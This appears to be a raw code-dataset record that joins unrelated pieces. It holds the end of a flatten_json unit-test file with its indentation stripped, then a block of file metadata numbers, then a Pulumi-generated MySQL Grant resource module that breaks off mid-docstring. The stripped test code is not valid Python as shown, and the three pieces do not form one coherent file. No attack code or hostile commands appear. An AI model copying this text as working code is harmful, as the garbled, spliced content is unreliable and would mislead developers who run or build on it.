"c_c_bar": 7,
"f_gar_garp_gat": "f7",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f7",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f7",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f8",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f8",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f8",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f9",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f9",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f9",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f10",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f10",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f10",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f11",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f11",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f11",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f7",
"c_c_foo": None,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f7",
"c_c_foo": None,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f7",
"c_c_foo": None,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f8",
"c_c_foo": None,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f8",
"c_c_foo": None,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f8",
"c_c_foo": None,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f9",
"c_c_foo": None,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f9",
"c_c_foo": None,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f9",
"c_c_foo": None,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f10",
"c_c_foo": None,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f10",
"c_c_foo": None,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f10",
"c_c_foo": None,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f11",
"c_c_foo": None,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f11",
"c_c_foo": None,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f11",
"c_c_foo": None,
"d": 10}]
self.assertEqual(expected, actual)
def test_flatten_preserve_lists_issue43(self):
"""https://github.com/amirziai/flatten/issues/43"""
dic = {
'a': {'a': ["x0", "x1", "x2"]},
'b': {'b': 'foo', 'c': 'bar'},
'c': {'c': [
{'foo': 2, 'bar': 6, 'baz': [
"n1", "n2", "n3", "n1.1", "n2.2"]},
{'foo': 5, 'bar': 7, 'baz': ["n4", "n5", "n6"]},
{'foo': float('nan')},
{'foo': 100},
]},
'd': {'g': 10}
}
expected = [
{'a_a': 'x0',
'c_c_foo': 2,
'c_c_baz': 'n1',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x1',
'c_c_foo': 2,
'c_c_baz': 'n1',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x2',
'c_c_foo': 2,
'c_c_baz': 'n1',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x0',
'c_c_foo': 2,
'c_c_baz': 'n2',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x1',
'c_c_foo': 2,
'c_c_baz': 'n2',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x2',
'c_c_foo': 2,
'c_c_baz': 'n2',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x0',
'c_c_foo': 2,
'c_c_baz': 'n3',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x1',
'c_c_foo': 2,
'c_c_baz': 'n3',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x2',
'c_c_foo': 2,
'c_c_baz': 'n3',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x0',
'c_c_foo': 2,
'c_c_baz': 'n1.1',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x1',
'c_c_foo': 2,
'c_c_baz': 'n1.1',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x2',
'c_c_foo': 2,
'c_c_baz': 'n1.1',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x0',
'c_c_foo': 2,
'c_c_baz': 'n2.2',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x1',
'c_c_foo': 2,
'c_c_baz': 'n2.2',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x2',
'c_c_foo': 2,
'c_c_baz': 'n2.2',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x0',
'c_c_foo': 5,
'c_c_baz': 'n4',
'c_c_bar': 7,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x1',
'c_c_foo': 5,
'c_c_baz': 'n4',
'c_c_bar': 7,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x2',
'c_c_foo': 5,
'c_c_baz': 'n4',
'c_c_bar': 7,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x0',
'c_c_foo': 5,
'c_c_baz': 'n5',
'c_c_bar': 7,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x1',
'c_c_foo': 5,
'c_c_baz': 'n5',
'c_c_bar': 7,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x2',
'c_c_foo': 5,
'c_c_baz': 'n5',
'c_c_bar': 7,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x0',
'c_c_foo': 5,
'c_c_baz': 'n6',
'c_c_bar': 7,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x1',
'c_c_foo': 5,
'c_c_baz': 'n6',
'c_c_bar': 7,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x2',
'c_c_foo': 5,
'c_c_baz': 'n6',
'c_c_bar': 7,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x0',
'c_c_foo': None,
'c_c_baz': None,
'c_c_bar': None,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': 100},
{'a_a': 'x1',
'c_c_foo': None,
'c_c_baz': None,
'c_c_bar': None,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': 100},
{'a_a': 'x2',
'c_c_foo': None,
'c_c_baz': None,
'c_c_bar': None,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': 100}]
actual = flatten_preserve_lists(dic, max_list_index=50, max_depth=10)
self.assertEqual(expected, actual)
def test_flatten_preserve_lists_issue69(self):
"""https://github.com/amirziai/flatten/issues/69"""
dic = {
'a': 'a',
'b': [
{'b': 1, 'c': 1},
{'b': 2, 'c': 2},
{'b': 3, 'c': 3},
{'b': 4, 'c': 4},
{'b': 5, 'c': 5},
{'b': 6, 'c': 6},
{'b': 7, 'c': 7},
{'b': 8, 'c': 8},
{'b': 9, 'c': 9},
{'b': 10, 'c': 10},
{'b': 11, 'c': 11},
{'b': 12, 'c': 12},
{'b': 13, 'c': 13},
{'b': 14, 'c': 14},
{'b': 15, 'c': 15},
{'b': 16, 'c': 16},
{'b': 17, 'c': 17},
{'b': 15, 'c': 18},
{'b': 16, 'c': 19},
{'b': 17, 'c': 20}
]
}
expected = [
{'b.c': 1,
'b.b': 1,
'a': 'a'},
{'b.c': 2,
'b.b': 2,
'a': 'a'},
{'b.c': 11,
'b.b': 11,
'a': 'a'},
{'b.c': 12,
'b.b': 12,
'a': 'a'},
{'b.c': 13,
'b.b': 13,
'a': 'a'},
{'b.c': 14,
'b.b': 14,
'a': 'a'},
{'b.c': 15,
'b.b': 15,
'a': 'a'},
{'b.c': 16,
'b.b': 16,
'a': 'a'},
{'b.c': 17,
'b.b': 17,
'a': 'a'},
{'b.c': 18,
'b.b': 15,
'a': 'a'},
{'b.c': 19,
'b.b': 16,
'a': 'a'},
{'b.c': 20,
'b.b': 17,
'a': 'a'},
{'b.c': 3,
'b.b': 3,
'a': 'a'},
{'b.c': 4,
'b.b': 4,
'a': 'a'},
{'b.c': 5,
'b.b': 5,
'a': 'a'},
{'b.c': 6,
'b.b': 6,
'a': 'a'},
{'b.c': 7,
'b.b': 7,
'a': 'a'},
{'b.c': 8,
'b.b': 8,
'a': 'a'},
{'b.c': 9,
'b.b': 9,
'a': 'a'},
{'b.c': 10,
'b.b': 10,
'a': 'a'}]
actual = flatten_preserve_lists(dic,
separator='.',
max_list_index=100,
max_depth=5)
self.assertEqual(expected, actual)
def test_flatten_preserve_lists_issue72(self):
"""https://github.com/amirziai/flatten/issues/72"""
dic = {'a': 0,
'b': [
{'c': 1,
'd': [{'e': 1}]},
{'c': 2,
'd': [{'e': 2}]},
{'c': 3,
'd': [{'e': 3}]},
{'c': 4,
'd': [{'e': 4}]},
{'c': 5,
'd': [{'e': 5}]}]}
expected = [
{'b.c': 1,
'a': 0,
'b.d': 1},
{'b.c': 2,
'a': 0,
'b.d': 2},
{'b.c': 3,
'a': 0,
'b.d': 3},
{'b.c': 4,
'a': 0,
'b.d': 4},
{'b.c': 5,
'a': 0,
'b.d': 5}]
actual = flatten_preserve_lists(dic,
separator='.',
max_list_index=10,
max_depth=5)
self.assertEqual(expected, actual)
def test_unflatten_with_list_deep(self):
dic = {'a': [
{'b': [{'c': [{'a': 5, 'b': {'a': [1, 2, 3]}, 'c': {'x': 3}}]}]}]}
dic_flatten = flatten(dic)
actual = unflatten_list(dic_flatten)
self.assertEqual(actual, dic)
def test_flatten_ignore_keys(self):
"""Ignore a set of root keys for processing"""
dic = {
'a': {'a': [1, 2, 3]},
'b': {'b': 'foo', 'c': 'bar'},
'c': {'c': [{'foo': 5, 'bar': 6, 'baz': [1, 2, 3]}]}
}
expected = {
'a_a_0': 1,
'a_a_1': 2,
'a_a_2': 3
}
actual = flatten(dic, root_keys_to_ignore={'b', 'c'})
self.assertEqual(expected, actual)
def test_command_line(self):
input_stream = StringIO(u'{"a": {"b": 1}}')
output_stream = StringIO()
cli(input_stream, output_stream)
output = output_stream.getvalue()
result = json.loads(output)
self.assertEqual(result, dict(a_b=1))
def test_replace_separators_none(self):
dic = {
'a_with_separator': {'b': [1, 2, 3]},
}
expected = {
'a_with_separator_b_0': 1,
'a_with_separator_b_1': 2,
'a_with_separator_b_2': 3
}
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_replace_separators_remove(self):
dic = {
'a_with_separator': {'b': [1, 2, 3]},
}
expected = {
'awithseparator_b_0': 1,
'awithseparator_b_1': 2,
'awithseparator_b_2': 3
}
actual = flatten(dic, replace_separators='')
self.assertEqual(expected, actual)
def test_replace_separators_something(self):
dic = {
'a_with_separator': {'b': [1, 2, 3]},
}
expected = {
'a.with.separator_b_0': 1,
'a.with.separator_b_1': 2,
'a.with.separator_b_2': 3
}
actual = flatten(dic, replace_separators='.')
self.assertEqual(expected, actual)
def test_replace_separators_nested(self):
dic = {
'a_with_separator': {'b_with_separator': [1, 2, 3]},
}
expected = {
'awithseparator_bwithseparator_0': 1,
'awithseparator_bwithseparator_1': 2,
'awithseparator_bwithseparator_2': 3
}
actual = flatten(dic, replace_separators='')
self.assertEqual(expected, actual)
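# Illustrative sketch (hypothetical helper, never invoked by the test runner):
# a minimal flatten/unflatten round trip using only the flatten_json calls
# exercised by the tests above; key paths use the default '_' separator.
def _example_round_trip():
    nested = {'a': 1, 'b': [{'c': [2, 3]}]}
    flat = flatten(nested)
    # Dict keys encode the path, list elements get numeric indices.
    assert flat == {'a': 1, 'b_0_c_0': 2, 'b_0_c_1': 3}
    # unflatten_list rebuilds the lists from those numeric components.
    assert unflatten_list(flat) == nested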
if __name__ == '__main__':
unittest.main()
| 28.672529
| 78
| 0.31554
| 8,375
| 68,470
| 2.20191
| 0.024478
| 0.070604
| 0.11713
| 0.043924
| 0.8993
| 0.890136
| 0.873922
| 0.855051
| 0.851852
| 0.832927
| 0
| 0.087404
| 0.503052
| 68,470
| 2,387
| 79
| 28.684541
| 0.454564
| 0.008412
| 0
| 0.873167
| 0
| 0
| 0.210467
| 0.001371
| 0
| 0
| 0
| 0
| 0.016393
| 1
| 0.013805
| false
| 0
| 0.002588
| 0
| 0.016825
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
293f18ccf733b02b839b4a0fc4975b7cada5eaea
| 26,947
|
py
|
Python
|
sdk/python/pulumi_mysql/grant.py
|
joesonw/pulumi-mysql
|
db3aa8cbfc8989a3708bcdf51ffd37427308c342
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2019-05-28T22:23:48.000Z
|
2020-11-17T09:32:42.000Z
|
sdk/python/pulumi_mysql/grant.py
|
joesonw/pulumi-mysql
|
db3aa8cbfc8989a3708bcdf51ffd37427308c342
|
[
"ECL-2.0",
"Apache-2.0"
] | 33
|
2019-05-13T16:15:19.000Z
|
2022-03-31T15:34:50.000Z
|
sdk/python/pulumi_mysql/grant.py
|
joesonw/pulumi-mysql
|
db3aa8cbfc8989a3708bcdf51ffd37427308c342
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2019-10-05T10:33:18.000Z
|
2021-06-21T03:35:40.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['GrantArgs', 'Grant']
@pulumi.input_type
class GrantArgs:
def __init__(__self__, *,
database: pulumi.Input[str],
grant: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
privileges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None,
roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
table: Optional[pulumi.Input[str]] = None,
tls_option: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Grant resource.
:param pulumi.Input[str] database: The database to grant privileges on.
:param pulumi.Input[bool] grant: Whether to also give the user privileges to grant the same privileges to other users.
:param pulumi.Input[str] host: The source host of the user. Defaults to "localhost". Conflicts with `role`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] privileges: A list of privileges to grant to the user. Refer to a list of privileges (such as [here](https://dev.mysql.com/doc/refman/5.5/en/grant.html)) for applicable privileges. Conflicts with `roles`.
:param pulumi.Input[str] role: The role to grant `privileges` to. Conflicts with `user` and `host`.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] roles: A list of roles to grant to the user. Conflicts with `privileges`.
:param pulumi.Input[str] table: Which table to grant `privileges` on. Defaults to `*`, which is all tables.
        :param pulumi.Input[str] tls_option: A TLS option for the `GRANT` statement. The value is suffixed to `REQUIRE`. A value of 'SSL' will generate a `GRANT ... REQUIRE SSL` statement. See the [MySQL `GRANT` documentation](https://dev.mysql.com/doc/refman/5.7/en/grant.html) for more. Ignored if MySQL version is under 5.7.0.
:param pulumi.Input[str] user: The name of the user. Conflicts with `role`.
"""
pulumi.set(__self__, "database", database)
if grant is not None:
pulumi.set(__self__, "grant", grant)
if host is not None:
pulumi.set(__self__, "host", host)
if privileges is not None:
pulumi.set(__self__, "privileges", privileges)
if role is not None:
pulumi.set(__self__, "role", role)
if roles is not None:
pulumi.set(__self__, "roles", roles)
if table is not None:
pulumi.set(__self__, "table", table)
if tls_option is not None:
pulumi.set(__self__, "tls_option", tls_option)
if user is not None:
pulumi.set(__self__, "user", user)
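    # Illustrative sketch (hypothetical values, kept as a comment so the generated
    # module's behavior is unchanged): a table-level grant built from these
    # arguments might look like
    #
    #   GrantArgs(
    #       database="app_db",
    #       user="app_user",
    #       host="localhost",
    #       privileges=["SELECT", "INSERT"],
    #       table="orders",
    #   )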
@property
@pulumi.getter
def database(self) -> pulumi.Input[str]:
"""
The database to grant privileges on.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: pulumi.Input[str]):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def grant(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to also give the user privileges to grant the same privileges to other users.
"""
return pulumi.get(self, "grant")
@grant.setter
def grant(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "grant", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
The source host of the user. Defaults to "localhost". Conflicts with `role`.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def privileges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of privileges to grant to the user. Refer to a list of privileges (such as [here](https://dev.mysql.com/doc/refman/5.5/en/grant.html)) for applicable privileges. Conflicts with `roles`.
"""
return pulumi.get(self, "privileges")
@privileges.setter
def privileges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "privileges", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
The role to grant `privileges` to. Conflicts with `user` and `host`.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
@property
@pulumi.getter
def roles(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of roles to grant to the user. Conflicts with `privileges`.
"""
return pulumi.get(self, "roles")
@roles.setter
def roles(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "roles", value)
@property
@pulumi.getter
def table(self) -> Optional[pulumi.Input[str]]:
"""
Which table to grant `privileges` on. Defaults to `*`, which is all tables.
"""
return pulumi.get(self, "table")
@table.setter
def table(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "table", value)
@property
@pulumi.getter(name="tlsOption")
def tls_option(self) -> Optional[pulumi.Input[str]]:
"""
A TLS option for the `GRANT` statement. The value is appended after `REQUIRE`. A value of 'SSL' will generate a `GRANT ... REQUIRE SSL` statement. See the [MySQL `GRANT` documentation](https://dev.mysql.com/doc/refman/5.7/en/grant.html) for more. Ignored if the MySQL version is below 5.7.0.
"""
return pulumi.get(self, "tls_option")
@tls_option.setter
def tls_option(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tls_option", value)
@property
@pulumi.getter
def user(self) -> Optional[pulumi.Input[str]]:
"""
The name of the user. Conflicts with `role`.
"""
return pulumi.get(self, "user")
@user.setter
def user(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user", value)
@pulumi.input_type
class _GrantState:
def __init__(__self__, *,
database: Optional[pulumi.Input[str]] = None,
grant: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
privileges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None,
roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
table: Optional[pulumi.Input[str]] = None,
tls_option: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Grant resources.
:param pulumi.Input[str] database: The database to grant privileges on.
:param pulumi.Input[bool] grant: Whether to also give the user privileges to grant the same privileges to other users.
:param pulumi.Input[str] host: The source host of the user. Defaults to "localhost". Conflicts with `role`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] privileges: A list of privileges to grant to the user. Refer to a list of privileges (such as [here](https://dev.mysql.com/doc/refman/5.5/en/grant.html)) for applicable privileges. Conflicts with `roles`.
:param pulumi.Input[str] role: The role to grant `privileges` to. Conflicts with `user` and `host`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] roles: A list of roles to grant to the user. Conflicts with `privileges`.
:param pulumi.Input[str] table: Which table to grant `privileges` on. Defaults to `*`, which is all tables.
:param pulumi.Input[str] tls_option: A TLS option for the `GRANT` statement. The value is appended after `REQUIRE`. A value of 'SSL' will generate a `GRANT ... REQUIRE SSL` statement. See the [MySQL `GRANT` documentation](https://dev.mysql.com/doc/refman/5.7/en/grant.html) for more. Ignored if the MySQL version is below 5.7.0.
:param pulumi.Input[str] user: The name of the user. Conflicts with `role`.
"""
if database is not None:
pulumi.set(__self__, "database", database)
if grant is not None:
pulumi.set(__self__, "grant", grant)
if host is not None:
pulumi.set(__self__, "host", host)
if privileges is not None:
pulumi.set(__self__, "privileges", privileges)
if role is not None:
pulumi.set(__self__, "role", role)
if roles is not None:
pulumi.set(__self__, "roles", roles)
if table is not None:
pulumi.set(__self__, "table", table)
if tls_option is not None:
pulumi.set(__self__, "tls_option", tls_option)
if user is not None:
pulumi.set(__self__, "user", user)
@property
@pulumi.getter
def database(self) -> Optional[pulumi.Input[str]]:
"""
The database to grant privileges on.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def grant(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to also give the user privileges to grant the same privileges to other users.
"""
return pulumi.get(self, "grant")
@grant.setter
def grant(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "grant", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
The source host of the user. Defaults to "localhost". Conflicts with `role`.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def privileges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of privileges to grant to the user. Refer to a list of privileges (such as [here](https://dev.mysql.com/doc/refman/5.5/en/grant.html)) for applicable privileges. Conflicts with `roles`.
"""
return pulumi.get(self, "privileges")
@privileges.setter
def privileges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "privileges", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
The role to grant `privileges` to. Conflicts with `user` and `host`.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
@property
@pulumi.getter
def roles(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of roles to grant to the user. Conflicts with `privileges`.
"""
return pulumi.get(self, "roles")
@roles.setter
def roles(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "roles", value)
@property
@pulumi.getter
def table(self) -> Optional[pulumi.Input[str]]:
"""
Which table to grant `privileges` on. Defaults to `*`, which is all tables.
"""
return pulumi.get(self, "table")
@table.setter
def table(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "table", value)
@property
@pulumi.getter(name="tlsOption")
def tls_option(self) -> Optional[pulumi.Input[str]]:
"""
